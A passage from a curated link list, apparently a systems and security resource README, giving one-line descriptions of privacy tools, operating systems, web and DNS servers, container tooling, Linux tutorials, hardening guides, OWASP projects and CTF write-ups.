engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://darksearch.io/"><b>darksearch</b></a> - the 1st real Dark Web search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.qwant.com/"><b>Qwant</b></a> - the search engine that respects your privacy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://duckduckgo.com/"><b>DuckDuckGo</b></a> - the search engine that doesn't track you.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://swisscows.com/"><b>Swisscows</b></a> - privacy safe web search<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://search.disconnect.me/"><b>Disconnect</b></a> - the search engine that anonymizes your searches.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://metager.org/"><b>MetaGer</b></a> - the search engine that uses anonymous proxy and hidden Tor branches.<br> </p> ##### :black_small_square: Secure Webmail Providers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://countermail.com/"><b>CounterMail</b></a> - online email service, designed to provide maximum security and privacy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://mail2tor.com/"><b>Mail2Tor</b></a> - is a Tor Hidden Service that allows anyone to send and receive emails anonymously.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tutanota.com/"><b>Tutanota</b></a> - is the world's most secure email service and amazingly easy to use.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://protonmail.com/"><b>Protonmail</b></a> - is the world's largest secure email service, developed by CERN and MIT scientists.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.startmail.com/en/"><b>Startmail</b></a> - private & encrypted email made easy.<br> </p> ##### :black_small_square: Crypto <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://keybase.io/"><b>Keybase</b></a> - it's open source and powered by public-key cryptography.<br> </p> ##### :black_small_square: PGP Keyservers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://keyserver.ubuntu.com/"><b>SKS OpenPGP Key server</b></a> - services for the SKS keyservers used by OpenPGP.<br> </p> #### Systems/Services &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Operating Systems <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.slackware.com/"><b>Slackware</b></a> - the most "Unix-like" Linux distribution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openbsd.org/"><b>OpenBSD</b></a> - multi-platform 4.4BSD-based UNIX-like operating system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hardenedbsd.org/"><b>HardenedBSD</b></a> - HardenedBSD aims to implement innovative exploit mitigation and security solutions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.kali.org/"><b>Kali Linux</b></a> - Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.parrotsec.org/"><b>Parrot Security OS</b></a> - cyber security GNU/Linux environment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.backbox.org/"><b>Backbox Linux</b></a> - penetration test and security assessment oriented Ubuntu-based Linux distribution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blackarch.org/"><b>BlackArch</b></a> - is an Arch Linux-based penetration testing distribution for penetration testers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.pentoo.ch/"><b>Pentoo</b></a> - is a security-focused livecd based on Gentoo.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securityonion.net/"><b>Security Onion</b></a> - Linux distro for intrusion detection, enterprise security monitoring, and log management.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tails.boum.org/"><b>Tails</b></a> - is a live system that aims to preserve your privacy and anonymity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vedetta-com/vedetta"><b>vedetta</b></a> - OpenBSD router boilerplate.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.qubes-os.org"><b>Qubes OS</b></a> - is a security-oriented OS that uses Xen-based virtualization.<br> </p> ##### :black_small_square: HTTP(s) Services <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://varnish-cache.org/"><b>Varnish Cache</b></a> - HTTP accelerator designed for content-heavy dynamic web sites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nginx.org/"><b>Nginx</b></a> - open source web and reverse proxy server that is similar to Apache, but very light weight.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://openresty.org/en/"><b>OpenResty</b></a> - is a dynamic web platform based on NGINX and LuaJIT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/alibaba/tengine"><b>Tengine</b></a> - a distribution of Nginx with some advanced features.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://caddyserver.com/"><b>Caddy Server</b></a> - is an open source, HTTP/2-enabled web server with HTTPS by default.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.haproxy.org/"><b>HAProxy</b></a> - the reliable, high performance TCP/HTTP load balancer.<br> </p> ##### :black_small_square: DNS Services <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nlnetlabs.nl/projects/unbound/about/"><b>Unbound</b></a> - validating, recursive, and caching DNS resolver (with TLS).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.knot-resolver.cz/"><b>Knot Resolver</b></a> - caching full resolver implementation, including both a resolver library and a daemon.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.powerdns.com/"><b>PowerDNS</b></a> - is an open source authoritative DNS server, written in C++ and licensed under the GPL.<br> </p> ##### :black_small_square: Other Services <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/z3APA3A/3proxy"><b>3proxy</b></a> - tiny free proxy server.<br> </p> ##### :black_small_square: Security/hardening <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/EmeraldOnion"><b>Emerald Onion</b></a> - is a 501(c)(3) nonprofit organization and transit internet service provider (ISP) based in Seattle.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/pi-hole/pi-hole"><b>pi-hole</b></a> - the Pi-holeยฎ is a DNS sinkhole that protects your devices from unwanted content.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/stamparm/maltrail"><b>maltrail</b></a> - malicious traffic detection system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Netflix/security_monkey"><b>security_monkey</b></a> - monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/firecracker-microvm/firecracker"><b>firecracker</b></a> - secure and fast microVMs for serverless computing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/StreisandEffect/streisand"><b>streisand</b></a> - sets up a new server running your choice of WireGuard, OpenSSH, OpenVPN, and more.<br> </p> #### Networks &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.capanalysis.net/ca/"><b>CapAnalysis</b></a> - web visual tool to analyze large amounts of captured network traffic (PCAP analyzer).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/digitalocean/netbox"><b>netbox</b></a> - IP address management (IPAM) and data center infrastructure management (DCIM) tool.<br> </p> ##### :black_small_square: Labs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://labs.networkreliability.engineering/"><b>NRE Labs</b></a> - learn automation by doing it. Right now, right here, in your browser.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ee.lbl.gov/"><b>LBNL's Network Research Group</b></a> - home page of the Network Research Group (NRG).<br> </p> #### Containers/Orchestration &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: CLI Tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/gvisor"><b>gvisor</b></a> - container runtime sandbox.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bcicen/ctop"><b>ctop</b></a> - top-like interface for container metrics.<br> </p> ##### :black_small_square: Web Tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/moby/moby"><b>Moby</b></a> - a collaborative project for the container ecosystem to assemble container-based system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://traefik.io/"><b>Traefik</b></a> - open source reverse proxy/load balancer provides easier integration with Docker and Let's encrypt.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Kong/kong"><b>kong</b></a> - The Cloud-Native API Gateway.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rancher/rancher"><b>rancher</b></a> - complete container management platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/portainer/portainer"><b>portainer</b></a> - making Docker management easy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jwilder/nginx-proxy"><b>nginx-proxy</b></a> - automated nginx proxy for Docker containers using docker-gen.<br> </p> ##### :black_small_square: Security <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/docker/docker-bench-security"><b>docker-bench-security</b></a> - is a script that checks for dozens of common best-practices around deploying Docker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/aquasecurity/trivy"><b>trivy</b></a> - vulnerability scanner for containers, suitable for CI.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://goharbor.io/"><b>Harbor</b></a> - cloud native registry project that stores, signs, and scans content.<br> </p> ##### :black_small_square: Manuals/Tutorials/Best Practices <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/wsargent/docker-cheat-sheet"><b>docker-cheat-sheet</b></a> - a quick reference cheat sheet on Docker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/veggiemonk/awesome-docker"><b>awesome-docker</b></a> - a curated list of Docker resources and projects.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/yeasy/docker_practice"><b>docker_practice</b></a> - learn and understand Docker technologies, with real DevOps practice!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/docker/labs"><b>labs </b></a> - is a collection of tutorials for learning how to use Docker with various tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jessfraz/dockerfiles"><b>dockerfiles</b></a> - various Dockerfiles I use on the desktop and on servers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kelseyhightower/kubernetes-the-hard-way"><b>kubernetes-the-hard-way</b></a> - bootstrap Kubernetes the hard way on Google Cloud Platform. No scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jamesward/kubernetes-the-easy-way"><b>kubernetes-the-easy-way</b></a> - bootstrap Kubernetes the easy way on Google Cloud Platform. No scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dennyzhang/cheatsheet-kubernetes-A4"><b>cheatsheet-kubernetes-A4</b></a> - Kubernetes CheatSheets in A4.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/kabachook/k8s-security"><b>k8s-security</b></a> - kubernetes security notes and best practices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://learnk8s.io/production-best-practices/"><b>kubernetes-production-best-practices</b></a> - checklists with best-practices for production-ready Kubernetes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/freach/kubernetes-security-best-practice"><b>kubernetes-production-best-practices</b></a> - kubernetes security - best practice guide.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hjacobs/kubernetes-failure-stories"><b>kubernetes-failure-stories</b></a> - is a compilation of public failure/horror stories related to Kubernetes.<br> </p> #### Manuals/Howtos/Tutorials &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Shell/Command line <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dylanaraps/pure-bash-bible"><b>pure-bash-bible</b></a> - is a collection of pure bash alternatives to external processes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dylanaraps/pure-sh-bible"><b>pure-sh-bible</b></a> - is a collection of pure POSIX sh alternatives to external processes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Idnan/bash-guide"><b>bash-guide</b></a> - is a guide to learn bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/denysdovhan/bash-handbook"><b>bash-handbook</b></a> - for those who wanna learn Bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.bash-hackers.org/start"><b>The Bash Hackers Wiki</b></a> - hold documentation of any kind about GNU Bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://pubs.opengroup.org/onlinepubs/9699919799/utilities/contents.html"><b>Shell & Utilities</b></a> - describes the commands offered to application programs by POSIX-conformant systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jlevy/the-art-of-command-line"><b>the-art-of-command-line</b></a> - master the command line, in one page.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://google.github.io/styleguide/shellguide.html"><b>Shell Style Guide</b></a> - a shell style guide for Google-originated open-source projects.<br> </p> ##### :black_small_square: Text Editors <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://vim.rtorr.com/"><b>Vim Cheat Sheet</b></a> - great multi language vim guide.<br> </p> ##### :black_small_square: Python <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://awesome-python.com/"><b>Awesome Python</b></a> - a curated list of awesome Python frameworks, libraries, software and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gto76/python-cheatsheet"><b>python-cheatsheet</b></a> - comprehensive Python cheatsheet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.pythoncheatsheet.org/"><b>pythoncheatsheet.org</b></a> - basic reference for beginner and advanced developers.<br> </p> ##### :black_small_square: Sed & Awk & Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://posts.specterops.io/fawk-yeah-advanced-sed-and-awk-usage-parsing-for-pentesters-3-e5727e11a8ad?gi=c8f9506b26b6"><b>Fโ€™Awk Yeah!</b></a> - advanced sed and awk usage (Parsing for Pentesters 3).<br> </p> ##### :black_small_square: \*nix & Network <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cyberciti.biz/"><b>nixCraft</b></a> - linux and unix tutorials for new and seasoned sysadmin.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tecmint.com/"><b>TecMint</b></a> - the ideal Linux blog for Sysadmins & Geeks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.omnisecu.com/index.php"><b>Omnisecu</b></a> - free Networking, System Administration and Security tutorials.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/cirosantilli/linux-cheat"><b>linux-cheat</b></a> - Linux tutorials and cheatsheets. Minimal examples. Mostly user-land CLI utilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/snori74/linuxupskillchallenge"><b>linuxupskillchallenge</b></a> - learn the skills required to sysadmin.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://cb.vu/unixtoolbox.xhtml"><b>Unix Toolbox</b></a> - Unix/Linux/BSD commands and tasks which are useful for IT work or for advanced users.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linux-kernel-labs.github.io/refs/heads/master/index.html"><b>Linux Kernel Teaching</b></a> - is a collection of lectures and labs Linux kernel topics.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://peteris.rocks/blog/htop/"><b>htop explained</b></a> - explanation of everything you can see in htop/top on Linux.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linuxguideandhints.com/"><b>Linux Guide and Hints</b></a> - tutorials on system administration in Fedora and CentOS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/NanXiao/strace-little-book"><b>strace-little-book</b></a> - a little book which introduces strace.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/goldshtn/linux-tracing-workshop"><b>linux-tracing-workshop</b></a> - examples and hands-on labs for Linux tracing tools workshops.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bagder/http2-explained"><b>http2-explained</b></a> - a detailed document explaining and documenting HTTP/2.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bagder/http3-explained"><b>http3-explained</b></a> - a document describing the HTTP/3 and QUIC protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.manning.com/books/http2-in-action"><b>HTTP/2 in Action</b></a> - an excellent introduction to the new HTTP/2 standard.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/"><b>Let's code a TCP/IP stack</b></a> - great stuff to learn network and system programming at a deeper level.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/nginx-admins-handbook"><b>Nginx Admin's Handbook</b></a> - describes how to improve NGINX performance, security and other important things.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/digitalocean/nginxconfig.io"><b>nginxconfig.io</b></a> - NGINX config generator on steroids.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://infosec.mozilla.org/guidelines/openssh"><b>openssh guideline</b></a> - is to help operational teams with the configuration of OpenSSH server and client.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gravitational.com/blog/ssh-handshake-explained/"><b>SSH Handshake Explained</b></a> - is a relatively brief description of the SSH handshake.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://kb.isc.org/docs/using-this-knowledgebase"><b>ISC's Knowledgebase</b></a> - you'll find some general information about BIND 9, ISC DHCP, and Kea DHCP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://packetlife.net/"><b>PacketLife.net</b></a> - a place to record notes while studying for Cisco's CCNP certification.<br> </p> ##### :black_small_square: Microsoft <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/infosecn1nja/AD-Attack-Defense"><b>AD-Attack-Defense</b></a> - attack and defend active directory using modern post exploitation activity.<br> </p> ##### :black_small_square: Large-scale systems <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/donnemartin/system-design-primer"><b>The System Design Primer</b></a> - learn how to design large-scale systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/binhnguyennus/awesome-scalability"><b>Awesome Scalability</b></a> - best practices in building High Scalability, High Availability, High Stability, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://engineering.videoblocks.com/web-architecture-101-a3224e126947?gi=a896808d22a"><b>Web Architecture 101</b></a> - the basic architecture concepts.<br> </p> ##### :black_small_square: System hardening <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cisecurity.org/cis-benchmarks/"><b>CIS Benchmarks</b></a> - secure configuration settings for over 100 technologies, available as a free PDF.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://highon.coffee/blog/security-harden-centos-7/"><b>Security Harden CentOS 7</b></a> - this walks you through the steps required to security harden CentOS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.lisenet.com/2017/centos-7-server-hardening-guide/"><b>CentOS 7 Server Hardening Guide</b></a> - great guide for hardening CentOS; familiar with OpenSCAP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/decalage2/awesome-security-hardening"><b>awesome-security-hardening</b></a> - is a collection of security hardening guides, tools and other resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/the-practical-linux-hardening-guide"><b>The Practical Linux Hardening Guide</b></a> - provides a high-level overview of hardening GNU/Linux systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://madaidans-insecurities.github.io/guides/linux-hardening.html"><b>Linux Hardening Guide</b></a> - how to harden Linux as much as possible for security and privacy.<br> </p> ##### :black_small_square: Security & Privacy <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackingarticles.in/"><b>Hacking Articles</b></a> - LRaj Chandel's Security & Hacking Blog.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/toniblyx/my-arsenal-of-aws-security-tools"><b>AWS security tools</b></a> - make your AWS cloud environment more secure.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://inventory.rawsec.ml/index.html"><b>Rawsec's CyberSecurity Inventory</b></a> - an inventory of tools and resources about CyberSecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tls.ulfheim.net/"><b>The Illustrated TLS Connection</b></a> - every byte of a TLS connection explained and reproduced.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices"><b>SSL Research</b></a> - SSL and TLS Deployment Best Practices by SSL Labs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://selinuxgame.org/index.html"><b>SELinux Game</b></a> - learn SELinux by doing. Solve Puzzles, show skillz.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://smallstep.com/blog/everything-pki.html"><b>Certificates and PKI</b></a> - everything you should know about certificates and PKI but are too afraid to ask.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://appsecco.com/books/subdomain-enumeration/"><b>The Art of Subdomain Enumeration</b></a> - a reference for subdomain enumeration techniques.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lifehacker.com/the-comprehensive-guide-to-quitting-google-1830001964"><b>Quitting Google</b></a> - the comprehensive guide to quitting Google.<br> </p> ##### :black_small_square: Web Apps <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/Main_Page"><b>OWASP</b></a> - worldwide not-for-profit charitable organization focused on improving the security of software.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project"><b>OWASP ASVS 3.0.1</b></a> - OWASP Application Security Verification Standard Project.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Santandersecurityresearch/asvs"><b>OWASP ASVS 3.0.1 Web App</b></a> - simple web app that helps developers understand the ASVS requirements.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/ASVS/tree/master/4.0"><b>OWASP ASVS 4.0</b></a> - is a list of application security requirements or tests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Testing_Project"><b>OWASP Testing Guide v4</b></a> - includes a "best practice" penetration testing framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/DevGuide"><b>OWASP Dev Guide</b></a> - this is the development version of the OWASP Developer Guide.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/wstg"><b>OWASP WSTG</b></a> - is a comprehensive open source guide to testing the security of web apps.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_API_Security_Project"><b>OWASP API Security Project</b></a> - focuses specifically on the top ten vulnerabilities in API security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://infosec.mozilla.org/guidelines/web_security.html"><b>Mozilla Web Security</b></a> - help operational teams with creating secure web applications.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Netflix/security-bulletins"><b>security-bulletins</b></a> - security bulletins that relate to Netflix Open Source.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/shieldfy/API-Security-Checklist"><b>API-Security-Checklist</b></a> - security countermeasures when designing, testing, and releasing your API.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://enable-cors.org/index.html"><b>Enable CORS</b></a> - enable cross-origin resource sharing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://appsecwiki.com/#/"><b>Application Security Wiki</b></a> - is an initiative to provide all application security related resources at one place.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GrrrDog/weird_proxies/wiki"><b>Weird Proxies</b></a> - reverse proxy related attacks; it is a result of analysis of various proxies.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dfir.it/blog/2015/08/12/webshell-every-time-the-same-purpose/"><b>Webshells</b></a> - great series about malicious payloads.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/blog/practical-web-cache-poisoning"><b>Practical Web Cache Poisoning</b></a> - show you how to compromise websites by using esoteric web features.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bl4de/research/tree/master/hidden_directories_leaks"><b>Hidden directories and files</b></a> - as a source of sensitive information about web application.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bo0om.ru/en/"><b>Explosive blog</b></a> - great blog about cybersec and pentests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.netsparker.com/security-cookies-whitepaper/"><b>Security Cookies</b></a> - this paper will take a close look at cookie security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GitGuardian/APISecurityBestPractices"><b>APISecurityBestPractices</b></a> - help you keep secrets (API keys, db credentials, certificates) out of source code.<br> </p> ##### :black_small_square: All-in-one <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lzone.de/cheat-sheet/"><b>LZone Cheat Sheets</b></a> - all cheat sheets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rstacruz/cheatsheets"><b>Danโ€™s Cheat Sheetsโ€™s</b></a> - massive cheat sheets documentation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://devhints.io/"><b>Rico's cheatsheets</b></a> - this is a modest collection of cheatsheets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://devdocs.io/"><b>DevDocs API</b></a> - combines multiple API documentations in a fast, organized, and searchable interface.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cheat.sh/"><b>cheat.sh</b></a> - the only cheat sheet you need.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gnulinux.guru/"><b>gnulinux.guru</b></a> - collection of cheat sheets about bash, vim and networking.<br> </p> ##### :black_small_square: Ebooks <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/EbookFoundation/free-programming-books"><b>free-programming-books</b></a> - list of free learning resources in many languages.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bitvijays.github.io/LFC-VulnerableMachines.html"><b>CTF Series : Vulnerable Machines</b></a> - the steps below could be followed to find vulnerabilities and exploits.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/manoelt/50M_CTF_Writeup"><b>50M_CTF_Writeup</b></a> - $50 million CTF from Hackerone - writeup.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/j00ru/ctf-tasks"><b>ctf-tasks</b></a> - an archive of low-level CTF challenges developed over the years.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hshrzd.wordpress.com/how-to-start/"><b>How to start RE/malware analysis?</b></a> - collection of some hints and useful links for the beginners.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.kegel.com/c10k.html"><b>The C10K problem</b></a> - it's time for web servers to handle ten thousand clients simultaneously, don't you think?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.benjojo.co.uk/post/why-is-ethernet-mtu-1500"><b>How 1500 bytes became the MTU of the internet</b></a> - great story about the Maximum Transmission Unit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://poormansprofiler.org/"><b>poor man's profiler</b></a> - like dtrace's don't really provide methods to see what programs are blocking on.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nickcraver.com/blog/2017/05/22/https-on-stack-overflow/"><b>HTTPS on Stack Overflow</b></a> - this is the story of a long journey regarding the implementation of SSL.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://drawings.jvns.ca/"><b>Julia's Drawings</b></a> - some drawings about programming and unix world, zines about systems & debugging tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/corkami/collisions"><b>Hash collisions</b></a> - this great repository is focused on hash collisions exploitation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/in3rsha/sha256-animation"><b>sha256-animation</b></a> - animation of the SHA-256 hash function in your terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://labs.ripe.net/Members/cteusche/bgp-meets-cat"><b>BGP Meets Cat</b></a> - after 3072 hours of manipulating BGP, Job Snijders has succeeded in drawing a Nyancat.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/benjojo/bgp-battleships"><b>bgp-battleships</b></a> - playing battleships over BGP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/alex/what-happens-when"><b>What happens when...</b></a> - you type google.com into your browser and press enter?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vasanthk/how-web-works"><b>how-web-works</b></a> - based on the 'What happens when...' repository.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://robertheaton.com/2018/11/28/https-in-the-real-world/"><b>HTTPS in the real world</b></a> - great tutorial explain how HTTPS works in the real world.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://about.gitlab.com/2018/11/14/how-we-spent-two-weeks-hunting-an-nfs-bug/"><b>Gitlab and NFS bug</b></a> - how we spent two weeks hunting an NFS bug in the Linux kernel.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://about.gitlab.com/2017/02/10/postmortem-of-database-outage-of-january-31/"><b>Gitlab melts down</b></a> - postmortem on the database outage of January 31 2017 with the lessons we learned.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.catb.org/esr/faqs/hacker-howto.html"><b>How To Become A Hacker</b></a> - if you want to be a hacker, keep reading.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ithare.com/infographics-operation-costs-in-cpu-clock-cycles/"><b>Operation Costs in CPU</b></a> - should help to estimate costs of certain operations in CPU clocks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cstack.github.io/db_tutorial/"><b>Let's Build a Simple Database</b></a> - writing a 